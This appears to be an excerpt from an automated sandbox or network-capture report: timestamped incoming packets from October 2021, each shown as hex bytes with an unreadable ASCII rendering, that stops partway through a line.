2021-10-13 13:52:05 UTC	529	IN	Data Raw: 18 c0 c6 b1 da 9a 02 78 f3 12 c4 d8 d1 a5 a4 c9 53 6d a5 9b c1 22 c6 c5 04 18 ae 8f e2 79 b7 56 4e a1 e9 b2 2e 7c 0c 80 32 12 f2 b8 d4 e5 32 86 9b a2 64 ec 52 3b 44 1d 0f b0 f5 44 be f5 93 2c c8 30 13 cf ef af f4 74 f7 b3 53 08 7a 3a c1 4d a8 d6 10 86 5a 6b 05 4c 74 1b 10 04 86 8a 86 3c 85 5d e7 4e 96 5a 9e ff 4e 97 f9 4e 71 fa 82 6e 88 98 94 f7 98 69 96 cc 46 d8 b6 86 d7 c5 e0 74 49 ca 31 1d 8e d2 e1 4d 46 77 c8 f5 31 02 b4 f8 db 7d 41 db f4 3e 53 80 fb 77 5a 15 70 24 8e 4f 55 47 c1 85 17 e6 4b cb c6 1f f8 48 94 91 b2 9b b2 88 28 74 e3 20 42 bf ae 0d e5 1b d8 49 90 c9 15 ba b4 05 af 88 ec b0 61 6a dc a0 2e fc 18 4b ad f7 46 16 fd f7 d4 19 48 48 a7 8e e4 99 1a 6b 2c ab 7f ff 9e d5 a1 8e bb 4b d2 22 ff d1 da 16 0c 56 84 e1 07 7e 87 d8 79 42 63 be 27 d5 32 Data Ascii: xSm"yVN.\|22dR;DD,0tSz:MZkLt<]NZNNqniFtI1MFw1}A>SwZp$OUGKH(t BIaj.KFHHk,K"V~yBc'2
2021-10-13 13:52:05 UTC	532	IN	Data Raw: c9 01 e7 26 1d 35 64 0b 3c 70 ce 2a 9b f0 8b f8 21 66 7f dc 4f 34 f8 2c 30 15 d6 7b 66 ff 48 20 e1 9c fe 2f 63 e2 8b 24 52 a4 99 b0 f7 90 71 a3 89 ac 1f be ef 83 71 cd 7f 80 c3 a3 5e 1c 5d bb e2 d7 7f 49 de 70 2d 28 0b 23 92 8c 71 66 8c 96 44 0c 55 b7 f4 db 09 ed 2d d6 e1 3f 80 c3 c4 5b 03 8f 84 50 86 80 10 1a 4b 84 97 11 fd 40 32 40 fd 2c 9a c9 4d 54 11 9f 92 b5 4e 21 3a 30 4c 79 65 c4 59 d2 3e 08 d5 74 0e c9 4e 8a c3 a3 b6 e9 be e3 78 8e 19 e1 58 bc b8 d2 e6 5e 7a c9 47 5d b7 61 3e c4 2f 41 cd 14 9a 38 86 74 63 2f 59 62 9b c1 8b f5 3c 6e e5 85 a0 33 f7 37 dd fb 4e a6 ed 7e a8 44 bd 6d f3 40 f1 27 42 44 f9 18 ba 8e f6 db fe b4 7a 08 31 e8 6d b5 50 3f 54 41 6c 8b 98 a0 93 93 4b 3a df 79 fa c6 86 6f 19 65 7f ea 76 83 78 59 d7 fb 98 81 29 04 03 fd 8f 22 b5 Data Ascii: &5d<p*!fO4,0{fH /c$Rqq^]Ip-(#qfDU-?[PK@2@,MTN!:0LyeY>tNxX^zG]a>/A8tc/Yb<n37N~Dm@'BDz1mP?TAlK:yoevxY)"
2021-10-13 13:52:05 UTC	534	IN	Data Raw: 26 04 7a d5 b6 d5 06 f0 1a cc 9f 9f 79 62 94 08 d0 9c 06 d2 af a8 ed 1e 01 18 de 97 a2 ac 3b 28 11 7f 2e 66 a5 13 30 4f c1 9b 2b 66 ac ee db 76 5b a8 f7 d8 64 2f 60 62 40 0a 44 2c 98 ba b7 2c 18 b4 d0 d9 63 ff fb c7 d1 dc d8 99 13 39 cb 2b 23 72 81 2f 5c 03 f4 c5 6f 9c 5f 7b b0 2e a0 8d 79 06 89 e6 8f 43 ae 71 0b 0b 8d b7 69 a9 49 ae 52 5c fa c3 60 3b 44 29 ce cf e6 86 c2 3f e7 a8 f4 4a 8d cc b9 38 ba a9 dc 20 ee 6b fd 2a 24 51 4b db 86 92 aa a3 44 bc 68 f3 2f db df 3b 86 54 c8 ae 53 88 2c b8 99 4d 1a 29 20 38 94 f0 21 82 18 ee 9f 00 f2 86 bd e7 20 00 5d 1c 6f 4a c8 f2 c3 14 59 8a 00 80 73 e6 8a b1 80 8f 4b 78 d7 c3 89 f7 0b ab 4f 41 1e c0 7f bf 5c bb 02 89 ce 2c f8 9c 10 a2 f8 c1 1a 8a e0 34 0c 74 0a cf 4d 5c 18 12 77 14 6d 4a b1 60 59 a7 4a 7f 23 b4 95 Data Ascii: &zyb;(.f0O+fv[d/`b@D,,c9+#r/\o_{.yCqiIR\`;D)?J8 k*$QKDh/;TS,M) 8! ]oJYsKxOA\,4tM\wmJ`YJ#
2021-10-13 13:52:05 UTC	535	IN	Data Raw: 7a 5c c8 f2 0d e5 e0 f3 46 97 e5 b6 52 27 9d 1b b5 69 14 69 36 ac 82 d2 00 53 5d 37 c8 82 0c fb 0f 46 c9 1e cf 68 a3 38 fb 78 28 4f bb 83 02 fe 0b 83 ff 70 dd b1 dd 6a b8 1f 09 d3 58 b5 62 85 f4 07 11 4c b3 f9 75 63 53 85 a7 9a 84 6d c2 c6 37 1f 7f 4e 9a c4 18 73 76 b8 44 fc d7 0f a3 0c 30 52 25 1e 9c 3b 3c 59 95 f7 1e 5a 06 15 f7 38 bb 9d fe 5c 62 d3 17 6d fb 5a 64 e5 28 51 02 d6 51 3e 43 7b 77 68 4d 53 f0 f7 09 6c 9f ef 5a 9a db 55 73 a6 9a b4 c1 86 d1 f2 b6 e3 98 32 31 17 ac 1a 76 7c dc bd 33 6e f4 e7 a4 7a 43 4e d7 05 e6 21 8b f3 48 56 a1 e4 14 8a e1 43 47 c6 a9 58 e7 f1 8d 53 d2 3b 56 70 e4 fb d4 1c a4 26 03 39 37 33 6d 6e 9c d5 58 b1 99 18 47 12 fa bc 2f 0f ad 0f ec e5 24 44 be 8b b1 8d 5b ef 65 ac ee 31 c7 3f f7 af c3 8f 80 73 5f d0 d3 f4 07 19 54 Data Ascii: z\FR'ii6S]7Fh8x(OpjXbLucSm7NsvD0R%;<YZ8\bmZd(QQ>C{whMSlZUs21v\|3nzCN!HVCGXS;Vp&973mnXG/$D[e1?s_T
2021-10-13 13:52:05 UTC	536	IN	Data Raw: 10 6d da 18 5f 3a be 0d 69 19 ec 08 66 b5 2d c1 4a be c5 52 50 90 7d d9 01 8a 6b 54 5b 66 63 d1 24 86 7a f9 7b 40 79 ff 86 a3 45 55 23 bb 43 3c 4b fe 25 a2 f6 47 8c 81 9e 7b 4d 75 5f 1d 59 cb 88 2e 9f 6a 8f d1 e7 05 ff 88 c7 36 88 1a 76 86 d7 90 d7 d1 f0 7a d4 ee 50 30 73 ec aa ba 35 d2 4a 46 76 6f 97 48 54 08 36 55 0e ba b8 fc 80 8c e5 2b 89 44 fb 50 bd 77 3c f6 fa 49 a9 fb 76 a0 b7 a0 31 38 68 1b 04 48 67 82 cc bd 91 9a 09 d1 0d b9 fd f1 4c 15 09 9b 99 b1 91 04 16 eb 99 75 6a 30 82 15 7b fc f6 18 63 0a 6c 61 04 be 3f e8 fa 2d 09 8b 83 e6 3a 61 e8 fd 15 44 c3 8d 4b 8c 5c 3f 84 14 11 03 ef fb 2a 0e 2e 7c cc 9a e9 44 7f 85 61 1b 91 0f 4d 0a 0c 68 0a 94 fa 80 5e de 0f 2d eb 5c ce 00 c4 ad f8 7c 5d e3 9f ba a4 8a 70 3d c6 6e 75 a1 4d 69 47 6b 6b 7e b9 1f d4 Data Ascii: m_:if-JRP}kT[fc$z{@yEU#C<K%G{Mu_Y.j6vzP0s5JFvoHT6U+DPw<Iv18hHgLuj0{cla?-:aDK\?*.\|DaMh^-\\|]p=nuMiGkk~
2021-10-13 13:52:05 UTC	538	IN	Data Raw: c6 8d 90 e7 08 46 a6 06 41 7a 04 75 19 54 a7 85 fd d8 83 20 7a f1 2a 24 4f 3c f2 52 85 76 c2 09 5f 2a 66 f5 2e 49 2a 65 c6 a3 45 59 7e d4 03 9b f8 fc 21 0f 5b 71 98 7a c6 31 ac 64 0c a6 33 3f d7 ee f2 29 1f 6d ec 4e 53 6f c8 c3 a4 45 b3 43 ff 0e 5f 43 9d af 27 d0 5d cf 05 40 2f 1d 44 b7 a7 9d 47 77 be 98 b3 b4 ca 92 dc ac 3b ba 75 a5 4b 5f 6e 81 7d b4 6b a1 b8 f7 1b 18 aa 1d 98 a1 8c 0f 84 21 3a 1a 93 8a 71 bb 01 34 b7 e5 53 2d ac db da 95 ce ed a0 2e 29 ba c9 e0 b6 c6 af f3 a4 f8 f8 8a 9e ea d0 a6 b6 65 24 ac 60 e1 cb fe f8 b0 fb 07 71 3d a3 00 a3 e3 c5 b7 89 f6 10 d0 66 33 4f 0a 18 ad 6b 66 4d 72 29 ef 7b 0c 9e e0 17 99 5b 58 80 28 47 ae 39 ff e2 a2 9f ab 62 78 30 67 1b d2 d7 f4 3a cc 67 7a a1 09 fd 3f 95 ab 3b 48 8d c3 25 2c e0 1f c0 7f 63 c8 11 fd b7 Data Ascii: FAzuT z$O<Rv_f.I*eEY~![qz1d3?)mNSoEC_C']@/DGw;uK_n}k!:q4S-.)e$`q=f3OkfMr){[X(G9bx0g:gz?;H%,c
2021-10-13 13:52:05 UTC	539	IN	Data Raw: 9c 1e b1 8d ed ed 81 53 a6 4a 5e 34 52 25 76 76 cf 46 0b 63 de cb 0f 3c eb 86 be 08 ea bd e7 9e 25 92 a8 16 b7 05 df 04 e4 bf a0 32 1c fd 8e f6 79 45 34 d7 ff e7 5f 99 c9 56 c5 9e e4 3b 1c 79 4f 69 89 11 37 d8 1c 19 07 53 df 79 29 32 6c a2 55 1c d1 ce dd 79 33 19 31 0d 60 1c c7 a5 3b db 96 98 61 79 3b 5c af fe 61 60 82 7c 3c db 7e 2d 54 61 4d 14 38 c4 40 d8 84 b8 d2 4a 95 71 de 52 af 83 d8 2c ef fc 34 5a da fb 38 1f ce c5 17 5b 4e 4e 18 3e a1 3e be 61 44 02 b1 e1 97 89 55 0b 62 da e8 f0 fa 78 c2 5a 62 c7 a9 52 64 be be c6 01 57 31 8f eb 84 23 01 ac 78 67 6b 84 6e d2 91 04 cb e7 3b 0b d2 58 cc 04 f6 3d d2 7d 7b ef 4e 54 c2 4e dc a3 c5 df f8 4d ac c7 11 ca fd 77 99 9c 20 c0 bf b6 d1 6a 03 35 18 07 56 b9 9e 49 01 cf 0f 7f cd e7 5f ec 21 84 62 2f 47 67 f0 bc Data Ascii: SJ^4R%vvFc<%2yE4_V;yOi7Sy)2lUy31`;ay;\a`\|<~-TaM8@JqR,4Z8[NN>>aDUbxZbRdW1#xgkn;X=}{NTNMw j5VI_!b/Gg
2021-10-13 13:52:05 UTC	540	IN	Data Raw: 1d f0 c4 aa 00 17 1e c0 7e 34 20 03 c1 c8 15 1c 79 7f ed a2 f8 c1 fb d2 f5 b5 55 41 fd 03 e6 81 2a 4e c7 eb 6d 20 b1 66 48 c3 1f 33 75 24 58 d2 3e 9b 92 f2 57 0f cb 9c 34 36 4c 00 7f 2e 13 49 53 d7 a2 ae 6d a3 71 96 73 1e de 7e a2 f7 93 e3 e0 b2 02 57 c9 38 92 7a 28 36 a9 61 da 03 f5 06 2d 4d 22 aa 34 59 1f f2 08 b1 86 a6 f1 78 60 fd 92 d5 36 5d 84 92 2c e9 bd 35 43 53 e6 aa 39 a6 88 fd 24 c2 e4 72 7f 97 51 e3 59 d3 d4 3d d7 16 bc 84 c4 e8 34 8e 92 9e df d1 47 2c 06 7d 2f e0 82 26 58 e2 c7 d5 90 55 a0 22 5c 4b a9 32 5e 01 0d ab 03 8d f4 cf ed 56 65 03 8a 95 ca 4b d6 12 56 bd 1f 7e 4d 60 fa fd a0 bd f5 93 63 94 b3 91 24 61 2f 09 02 8e 58 11 41 e8 15 a7 27 55 29 6c 48 4c e8 c9 ff ba f9 ad 76 2c 7a c8 18 9f 72 fd 97 6a a5 52 db 42 46 0c 69 a5 e7 2a 09 25 95 Data Ascii: ~4 yUANm fH3u$X>W46L.ISmqs~W8z(6a-M"4Yx`6],5CS9$rQY=4G,}/&XU"\K2^VeKV~M`c$a/XA'U)lHLv,zrjRBFi%
2021-10-13 13:52:05 UTC	541	IN	Data Raw: 0d f4 28 ba 5b 90 23 da 69 4a 47 d5 bf bb 12 ef fa 3f ba 54 0f 47 13 30 e0 8c b3 1f dc c7 d8 e3 8e 66 f4 3d 70 00 77 c1 a8 e8 bc 90 62 19 93 61 c1 b1 5d 2f 54 74 f5 32 4c f5 8b f6 cb ed fb 87 32 a0 24 27 b9 55 8e e4 40 c4 64 c8 14 5b 84 51 cd 10 91 5b 20 2f b5 1d 2e c0 08 d7 57 73 75 21 cc a5 54 c3 f5 97 90 6b 4e 53 c1 ca c3 ff 74 b3 43 f1 5e 6b 6e 5c 53 a2 93 ed b3 ef a9 ad 7b 45 3a 58 07 c0 01 da 67 3e 38 cf 68 29 d7 0d 9f b9 b0 ca 98 e5 42 6f 12 80 3f f9 85 76 37 ef bb e4 54 75 ef 2b fc 20 4e 1a 97 b3 13 83 f0 3c a2 25 da 00 df c9 61 3a 12 5f 17 7b 26 a4 20 fa 36 7d dc a8 f0 6d 07 54 e6 80 35 d5 64 24 74 2f 08 fc 39 1d f8 34 8c 86 7e 5a 15 bf 18 22 22 6f e3 0f 71 4c c3 72 5c b6 a9 45 66 a5 16 79 aa 64 8f 30 ec ca ee 56 11 83 42 47 2c fb 2c 66 92 e2 90 Data Ascii: ([#iJG?TG0f=pwba]/Tt2L2$'U@d[Q[ /.Wsu!TkNStC^kn\S{E:Xg>8h)Bo?v7Tu+ N<%a:_{& 6}mT5d$t/94~Z""oqLr\Efyd0VBG,,f
2021-10-13 13:52:05 UTC	543	IN	Data Raw: 7c 4d 5d 4b 13 cb cc 1c 9c 91 80 6e 25 93 be 4a f7 51 ec db 7f 0f 16 65 81 7e a6 4c 33 3a 30 e1 71 3d 1d 09 ef fb 4c 69 47 7b 17 55 b9 1f 06 d8 79 1b 6e 0b 21 b9 48 bc 49 97 14 bb 40 29 70 20 82 f8 f4 50 48 b7 05 b4 ab f6 07 f2 f4 27 56 27 e1 8d 55 bf 9c 75 17 5f 99 e9 07 36 67 cd bf b2 f7 c2 01 ff 63 6a 72 0b 30 7b 92 8c 42 4f 36 bc d2 fc 6e ab 4e 74 dd cd 49 8e 21 93 40 c6 28 b5 73 ee a3 8e 15 91 b7 a8 0e e9 a0 84 19 68 8a 7a 2d 28 f2 3b cf 4a c0 ca 3d 5a bf 3d 03 c5 19 08 eb 32 2d ac 3f 01 63 4d 52 51 2e 69 45 2e 02 d7 7f 39 38 4e b3 98 7b 76 e8 19 65 50 04 d1 79 dc db d8 52 3c 89 1f 2e 38 a5 37 61 e6 7f c2 d8 9d 55 c4 f2 b1 70 7a 9e e0 2a b6 e3 b1 24 60 6e 80 11 db 40 92 33 f4 40 ae 90 c3 70 c2 68 82 13 18 10 40 0e f1 51 f1 48 91 67 d8 2d 39 df 43 f4 Data Ascii: \|M]Kn%JQe~L3:0q=LiG{Uyn!HI@)p PH'V'Uu_6gcjr0{BO6nNtI!@(shz-(;J=Z=2-?cMRQ.iE.98N{vePyR<.87aUpz*$`n@3@ph@QHg-9C
2021-10-13 13:52:05 UTC	544	IN	Data Raw: 16 42 35 d7 c2 29 47 cb 7b e4 1b 5f e3 90 c9 3f 8a 0b f8 61 91 f5 b3 c1 b4 75 ac 09 f2 38 37 a6 51 48 85 8e d2 55 41 e1 91 80 e6 4a 03 6c 52 80 fa 95 f5 ef a2 ae 92 79 e8 98 30 cd 3c c6 ec 41 0f d9 53 cb 1c b5 14 ea 60 e0 62 8d ec 2c ad 3e 82 96 03 e4 84 a3 62 cb 7f 2c 09 c2 04 2c 85 0f 4d 5c 61 34 a6 dc 9b a2 a5 fe 8b 20 81 5d f1 74 c8 b6 b0 02 da de c3 0e 89 d7 c9 2a aa 5a 50 1e 59 48 cf 9c 3c 38 d4 5a 02 57 b8 ff 3c 0f 87 1c 12 72 25 6f 5c 84 f7 a8 64 be b8 fd fc 52 a6 34 f1 de 15 17 a9 3e 70 15 97 b0 8b 02 06 e0 41 b6 39 53 84 cb 3b 75 74 7a 39 74 1d 78 c7 c4 47 aa 20 a7 b1 50 d7 4e 20 3c 52 2e ee 8c a6 54 4e 65 e1 27 b3 ba 89 79 50 41 84 ee e6 84 be 98 56 db 99 10 6d 25 f3 b2 97 8a 8f c7 10 58 84 eb 87 3b 07 85 ef c3 f4 74 f7 38 f2 fc a0 fc 44 70 09 Data Ascii: B5)G{_?au87QHUAJlRy0<AS`b,>b,,M\a4 ]t*ZPYH<8ZW<r%o\dR4>pA9S;utz9txG PN <R.TNe'yPAVm%X;t8Dp
2021-10-13 13:52:05 UTC	545	IN	Data Raw: 26 87 8c eb 0e b7 6e 0c 3a 67 bb e1 c8 f5 8b fc 27 1b 91 32 60 b1 2c e2 71 e0 3c 91 41 d3 1a 62 59 b9 a8 08 bb 9c 56 5b d4 ec ef 48 9a 02 7b 6a ef 14 b9 7c d6 42 83 ac 07 46 d3 a7 e0 46 fe be 3f 7d 2f 25 a8 f2 51 57 3e 32 17 55 d5 de 61 54 54 41 1a 18 9f 38 12 13 7f 0f 58 57 d5 ca 88 76 04 4c bb d5 e3 ab d5 71 90 dd c9 a2 b0 14 25 c0 bd a8 10 11 63 e6 b3 2c 5c 66 c0 35 cd 1e 44 57 4c 4f 65 1d 2c f4 e5 cd 7d f1 21 ab ff d4 99 d8 e1 11 9a 01 26 e6 19 22 aa 33 64 34 a8 f9 9e bb c8 e2 dc 4a 69 05 1c db b7 7d 0f 6b 62 97 4d ae 30 f7 b6 c2 6e 81 d0 18 03 c7 b9 30 dd 2c cd 90 74 d9 b6 b5 8f 1f 6d 96 4b b8 cb bc eb f0 cd 66 4b b8 e9 ae b4 88 f8 ed a0 17 a4 8b 1b 3d 76 bb 9e e5 5f 8a fc 9a e4 fc 39 31 5e f2 84 24 a4 ed c9 51 b1 b1 66 54 22 07 f4 ac d8 3d af b7 5c Data Ascii: &n:g'2`,q<AbYV[H{j\|BFF?}/%QW>2UaTTA8XWvLq%c,\f5DWLOe,}!&"3d4Ji}kbM0n0,tmKfK=v_91^$QfT"=\
2021-10-13 13:52:05 UTC	546	IN	Data Raw: 0b 6b 2f 09 06 85 9d e7 be 17 ae 15 41 c8 dd 12 73 a3 85 0a b6 f0 93 05 d5 4b e7 a2 48 9e 72 25 f0 6a a5 ea 4b 22 99 cc 0c 00 97 80 6e 27 2d 51 76 06 ae 9e d5 4f da b6 17 55 fe 76 8c cd 52 9c 6f e4 c9 b0 1e fa 39 08 95 9e 70 ce a6 47 e0 7a 4c 99 8a e8 7e 04 54 96 8c ca 27 33 66 25 40 c0 de 7d 22 10 74 10 5f 1a 6e 6b a6 d5 bb 69 1f 45 ae c7 df bd b7 13 7c 92 1c 29 d3 e6 43 e6 e2 47 25 3c 57 68 04 9c 95 cb d9 8e 35 93 0f e8 4d eb 68 c4 30 e7 2e 26 d9 ca cc fe 66 e5 5f 85 ca fb 63 90 f0 01 b2 c9 52 a7 51 01 e9 0d b8 88 fa 93 53 0a ab 36 9c 38 82 ce a9 f5 de 7c de 44 04 99 d6 17 7b 6b ac a6 5a 82 24 9d 9c b1 b3 42 2e 02 ba f9 25 4f 18 d5 9d f6 d3 10 e7 11 28 38 b0 03 8f be 34 8b b5 06 f0 e1 30 f5 5c 62 2e 09 ef d8 27 0d 41 46 e2 35 a6 03 3b 47 a2 24 74 f8 6b Data Ascii: k/AsKHr%jK"n'-QvOUvRo9pGzL~T'3f%@}"t_nkiE\|)CG%<Wh5Mh0.&f_cRQS68\|D{kZ$B.%O(840\b.'AF5;G$tk
2021-10-13 13:52:05 UTC	548	IN	Data Raw: 64 45 ed be 93 2c 8a 35 26 a8 59 fc 03 20 70 b8 0b 3f 23 ae 9a d3 c9 87 c9 29 af 5c 06 8b d3 09 50 87 ba 23 aa 75 cd 98 0b 74 a3 69 3c ee 18 e5 bc 9f 3c a3 9b 77 e5 30 84 ee 85 cd d8 9c 31 75 70 ba d4 8e 1b 4b 97 88 c4 b9 42 b0 ee 84 fb 81 be 06 c0 89 c2 08 35 38 1c 50 0f fe 64 58 e5 55 e5 e1 44 36 2e c3 50 56 3d f4 e0 02 72 f0 7f c9 5c df 6b a3 97 4e fd d1 63 6e 7b 78 0f 6d d6 20 8b da 8a c7 41 14 10 1c a2 83 c0 ad 4a 57 8c 22 83 1f 41 15 6c 1e 42 ba 6d 47 1d 0d 0f 3a cb 18 d7 32 c6 13 9a ee 81 2a 09 85 35 4c bb 1e 1a 2e fc e2 6e 5c ef c0 88 07 ea 82 cb 8f a6 ee ff fe d1 fd d6 92 50 53 10 f8 01 21 3f 02 36 a3 fd b0 41 3c e0 eb 26 15 db c4 70 4b 33 67 9b a0 d4 62 a1 2c ac 7d d4 78 5a fc 88 48 d2 72 ae 0a 03 11 ad 0b e7 8a ac 64 8d ba 3a d9 ae 0a 1a 75 1b Data Ascii: dE,5&Y p?#)\P#uti<<w01upKB58PdXUD6.PV=r\kNcn{xm AJW"AlBmG:2*5L.n\PS!?6A<&pK3gb,}xZHrd:u
2021-10-13 13:52:05 UTC	549	IN	Data Raw: 09 41 70 e3 23 1e b6 69 70 75 b4 b9 9d 60 87 3a d1 52 50 92 33 e8 54 f8 c6 04 9c 6a b6 45 15 18 10 40 0e de ce ff 48 91 e5 1c cd 21 d0 42 80 00 b5 7e 5e c6 3a f5 61 24 01 8f 6f 79 9d 47 98 7c 32 5f 00 9e 2d ed 74 4a 8d f5 69 ac 83 06 c7 7f 6a ef 5f 4a 9f 56 45 eb fb ef b1 8d 3e 79 19 ff b8 e2 54 db f0 76 b6 85 80 7b 5b 7d 96 95 06 19 55 24 29 dd 4d 43 54 42 16 7f 9f da b1 a7 ca ed 76 4a 4c 53 4f a2 b4 d4 b6 56 f1 84 2b ce 91 22 f0 f9 92 23 d1 3d 53 98 77 9c 1f 61 7a ce 4d 87 a3 4b c4 a5 5c 73 f4 4c 4f 40 59 97 27 9a 2b e5 e3 a6 1c b5 9c 67 e7 19 af 14 93 c7 96 94 23 ab f0 08 bb a5 5e 33 d3 c8 29 3a 80 ce e2 27 53 9a b6 3b ea 02 ae 58 a5 15 51 b7 92 32 1b 1b 30 ae c6 96 ac 7d c3 a9 19 41 f0 4b 7f d8 83 c7 1c e4 66 7e 31 6b 17 ac 68 c5 9e a0 83 6c 3a bb 6d Data Ascii: Ap#ipu`:RP3TjE@H!B~^:a$oyG\|2_-tJij_JVE>yTv{[}U$)MCTBvJLSOV+"#=SwazMK\sLO@Y'+g#^3):'S;XQ20}AKf~1khl:m
2021-10-13 13:52:05 UTC	550	IN	Data Raw: de 98 07 97 53 d7 0f 78 79 8e 95 4d ff fb b4 02 08 69 18 60 fa d8 e8 a2 a7 02 7d f0 ba 69 f5 e6 d5 68 da 2a 57 0b 9c d6 6e 09 f7 cf 38 a5 b4 ff 75 32 ef 54 67 e5 c4 86 96 a5 50 66 37 22 32 35 32 e0 68 bb 69 8a 92 28 94 31 80 54 a8 4a 89 0c 97 1e 7d 42 2b e6 26 87 9c 73 0e b7 6e 0c b4 0a bb e1 10 68 91 43 6b d7 43 7b 25 90 be fe 6f 69 81 69 31 69 e9 b9 c4 7a 0f b8 b5 2b c4 1c 0e 35 5b 4b 74 73 6f 65 a9 1c fe de e6 b2 f1 17 05 b1 e7 b6 7f 9e f0 e6 e1 eb ad ba 6f b7 0e f3 bd 93 07 17 6f 72 72 03 cc 8e ec 5c 43 57 d2 2c f2 5c 68 4f 5a 35 12 21 91 e1 91 89 e2 85 82 e5 3d 92 82 a3 c8 99 67 7d ac 32 ef 41 8b a5 6a f3 5c e5 87 ed 5c e5 f3 3b c6 48 6d e7 82 5a e5 7b 94 88 f0 4a 90 18 b4 41 3b 52 f1 73 65 af 6c 40 aa d6 61 36 a8 57 fd 93 c5 86 2d 18 b4 d9 51 64 fe Data Ascii: SxyMi`}ih*Wn8u2TgPf7"252hi(1TJ}B+&snhCkC{%oii1iz+5[Ktsoeoorr\CW,\hOZ5!=g}2Aj\\;HmZ{JA;Rsel@a6W-Qd
2021-10-13 13:52:05 UTC	551	IN	Data Raw: 05 f4 6a 72 3b f1 de 96 dc 3d e1 72 11 92 3b 9e 2c 87 5f e5 b6 7c af 6c 20 ec be 76 f1 6c db ad 78 ad 92 17 42 69 21 3c dd b2 f6 27 48 4b 60 30 58 19 41 7a 60 f6 ad 76 7f 91 92 4c d2 0d e1 62 4f 56 41 1e 32 41 4d ac 75 fd e7 79 fe 35 c0 c8 4f 94 cd 12 b1 7a 18 e1 7a 05 e1 6c 3e 4d 13 bb 15 c9 35 aa d6 64 44 6f ad 8a 4f e5 1a a0 f7 f0 a3 42 91 88 7e eb 87 83 2c 24 f7 9b 8e b1 00 b1 9e 44 59 03 8b dd a2 27 ac 13 58 eb 4d 51 65 49 f6 0c e3 9e 01 24 7a 7b 3c 4d 62 c1 a8 c4 ef 10 ff 4b 5e 3c df fd 29 fa d3 4a f4 93 ff c9 84 49 89 0b 81 ac 35 79 35 d2 f0 bb 04 12 e5 56 5f 04 b6 57 7f e2 8b b5 51 98 03 bf 34 d7 f1 d7 a4 51 72 20 3a 61 49 0c bc 21 c4 8c 59 5f ca 7d d0 26 6f 18 69 75 8c 02 0f 92 de 00 6c 17 21 2e 6d 57 26 38 89 ca 2a 24 d4 6b 13 5c 71 17 91 d4 da Data Ascii: jr;=r;,_\|l vlxBi!<'HK`0XAz`vLbOVA2AMuy5Ozzl>M5dDoOB~,$DY'XMQeI$z{<MbK^<)JI5y5V_WQ4Qr :aI!Y_}&oiul!.mW&8*$k\q
2021-10-13 13:52:05 UTC	552	IN	Data Raw: 9d 07 40 5e 65 45 b7 a7 5d cb 07 0c 9f bd fc c3 e1 d9 d8 b1 17 78 0c 0d e0 e4 34 ae 64 93 57 29 bd ed 9e 37 d4 23 dc 42 06 eb 49 71 c2 3e 6d b6 18 b2 f1 ca 6a 15 6d 9c 50 29 17 fd b1 90 47 5d cb 89 56 0a 44 1a 93 ed 7d 2c b3 68 be 38 31 84 32 74 c7 07 f3 a1 fa 1b f5 3f 8c 3c ad 20 80 b0 e0 51 3c aa e2 70 b2 59 70 50 44 f1 95 cb f6 dd 51 5c e9 e9 48 ca e5 72 e6 4d 5c 97 18 32 54 c7 fd d3 a3 69 63 72 a7 be 59 65 d4 ef a8 83 49 53 74 e7 32 03 c9 17 21 76 40 89 c2 8e af be 1e 91 29 64 c8 50 18 48 01 b7 3c 8b 64 ef 00 42 55 da 7b ce 46 ca fe 7c 8a e9 86 e6 d3 6a 55 da 21 7b 49 4a 71 33 a4 82 a3 1e 37 59 42 d5 3d 7b d9 ce 60 6c 48 9d a1 51 4f 79 5e 14 64 15 f5 a3 22 6f fb c0 1b 70 2f 42 f0 01 b0 32 c3 7e 5a 7d 0a d5 81 99 c2 a6 c0 51 1d d2 05 b4 a1 04 38 d7 a4 Data Ascii: @^eE]x4dW)7#BIq>mjmP)G]VD},h812t?< Q<pYpPDQ\HrM\2TicrYeISt2!v@)dPH<dBU{F\|jU!{IJq37YB={`lHQOy^d"op/B2~Z}Q8
2021-10-13 13:52:05 UTC	554	IN	Data Raw: 1a 23 17 2e bf 06 1b 15 d7 cf 9c c0 5f af 7d d2 57 57 0e dd 4a 6d aa be 37 1f c7 0d a2 61 d8 07 09 fa 46 07 35 fb d7 0f f8 18 d3 22 f1 67 d9 1c b5 e7 aa 85 18 52 bf 27 0e 4f d6 1b 5b 57 e8 9a 2a c7 37 84 24 1f 00 78 05 90 06 73 73 d0 55 61 66 09 8a 2b 53 60 bb 1c 81 96 26 2d 03 25 7b 5e 5d 0f e0 68 6e fa bd d1 fe 4a 34 80 54 f8 b3 4d 1e 77 f4 83 13 9d d0 34 4e 92 35 2b 4f 91 e4 f4 2b af e0 43 bb 04 31 4a d7 c0 ca 18 9e f9 c2 50 e4 3c c1 9a 7e cf 65 0f 51 7f a6 1a 97 d5 9f 9c b1 03 97 e7 90 7b 00 ef ce bc 1a c1 14 6b bb d2 b1 8d 30 e8 09 c7 ee 4d d3 6c 2c 32 74 58 bb 31 89 48 c4 78 4c e8 ab db ca 2d de fd 0c 07 7c 7f cf 68 b3 94 0a b3 b5 ab e9 8b a5 e3 d3 3d 26 ca 34 ac f4 0f 92 ba 90 51 cd 17 11 63 0e 9c f4 a3 99 bc 0e 31 ff 6b 23 4b 92 a1 57 6f 4d 9b f6 Data Ascii: #._}WWJm7aF5"gR'O[W*7$xssUaf+S`&-%{^]hnJ4TMw4N5+O+C1JP<~eQ{k0Ml,2tX1HxL-\|h=&4Qc1k#KWoM
2021-10-13 13:52:05 UTC	555	IN	Data Raw: c1 40 f9 b4 36 4b b1 47 f4 22 c0 b7 10 52 52 b0 3a 2d 3f 0f 04 5b bc ff e8 1a 3b 0f af 04 d1 d6 b1 97 23 86 c2 6f 19 31 a2 18 2d 67 b6 1d c7 d3 10 2b 84 5f 66 fb 29 d6 44 b1 f9 34 31 52 69 4d 20 d2 f3 a8 2c fc c8 38 8b dd 39 30 1b cb 53 a0 a1 2c 4b a9 32 5e 19 d7 35 ce ae 7f f0 d4 4a f6 e9 52 53 be e1 25 1a 95 c9 71 7e 27 83 77 2e 17 c9 4c 43 cc 02 3a 41 38 35 71 b1 8a 08 68 1a 1a b5 3e cf 87 51 18 61 04 58 6d 09 38 f0 78 33 37 b5 2a 6e d4 01 56 ae 0e a7 69 34 90 fe 9a 4e b8 c7 a3 7c 59 78 f4 7d f4 8e eb ef e0 eb 27 49 e8 8f f3 00 70 ef 9e 1b 75 95 fb 18 6a e9 31 a1 1d ce fd 4b 0d ef 94 f0 14 26 1f 68 63 0e df cb d2 a1 86 27 ea a8 33 63 2d b1 8c f9 c8 47 84 cc 8c ac d0 41 f4 32 47 26 ee 95 20 84 22 d8 f0 11 dd 5d f9 2c b5 2c 8c 68 2a 08 bf 01 02 9e 95 23 Data 